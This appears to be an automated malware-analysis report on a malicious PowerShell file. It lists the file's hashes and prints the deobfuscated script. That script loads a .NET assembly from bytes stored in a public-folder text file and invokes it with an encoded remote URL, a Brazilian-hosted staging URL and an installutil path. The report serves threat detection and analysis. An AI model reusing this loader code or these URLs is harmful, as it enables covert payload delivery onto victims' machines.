Malicious

a7fce5a5fba08f721712adb26bc4553d

PowerShell | MD5: a7fce5a5fba08f721712adb26bc4553d | Size: 1.65 KB | application/x-powershell

Characteristics
Hash: Hash Value
MD5: a7fce5a5fba08f721712adb26bc4553d
Sha1: 3302da86f9a40311bb3a7ca1d28c1560d5a6ba5b
Sha256: f875444b519bce683ab8e1d4725713a47c07a126aa420db8fc360c9652259cac
Sha384: 0e59065c343754a8966695bc2d6a88f8490ca6ef87e51d159373f56dcfc6f89b270c98b20cb65a2516e884313df18e31
Sha512: 05c8ac1cede1824169c5e0a16aec24ea06648feacd147c2f90b8d840119d6d68b849ab3d0c12c6d04015916e20f0cbc9b0b909d9f10038b9fb9d488bf643e391
SSDeep: 48:pAlbx5Qh2QaAAU0rXtrVJR/RpreSkde4OggzAM5MxzQw:pQbfQh2QadUwz3Sve4mzExkw
TLSH: 5731495066F99608B2B35D04EAFF65528C3B7B7E9D7ACA0D0050D14E17A1A44CDBBF32
File Structure
a7fce5a5fba08f721712adb26bc4553d: Malicious
    [Deobfuscated PS]: Malicious
Artefacts
Name: Deobfuscated PowerShell
Value:

$RBBfZ = "https://andrefelipedonascime1775471117328.2082219.meusitehostgator.com.br/FVTwhWzaQj_06_04_Meus_ArquivosDeTexto/PeNo"
$zgHoW = "%base64%dHh0LmIvbW9jLmt1cXVzY2MuZG0vLzpzcHR0a緒=="
$zgHoW = ($zgHoW -replace @("緒", "A"))
$cTFzN = "C:\Users\Public\tqkdp.txt"
$qbczm = (Get-Content -Path $cTFzN -Encoding "UTF8")
$qbczm -replace @(" ", "")
[byte[]] $ltcjm = [List`1]::"new"()
$ltcjm = ($qbczm -split "," | ForEach-Object [byte] ($_."Trim"()))
$XFTCp = [Assembly]::"Load"($ltcjm)
$rqACJ = $XFTCp."GetType"("ClassLibrary3.Class1")
$XDrQd = $rqACJ."GetMethod"("prFVI")."invoke"($RvhDi, [object[]] (@($zgHoW, "C:\Users\Public\grddz的这五js", "D DDC:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil", "$true", $RBBfZ)))

Characteristics
No malware configuration was found at this point.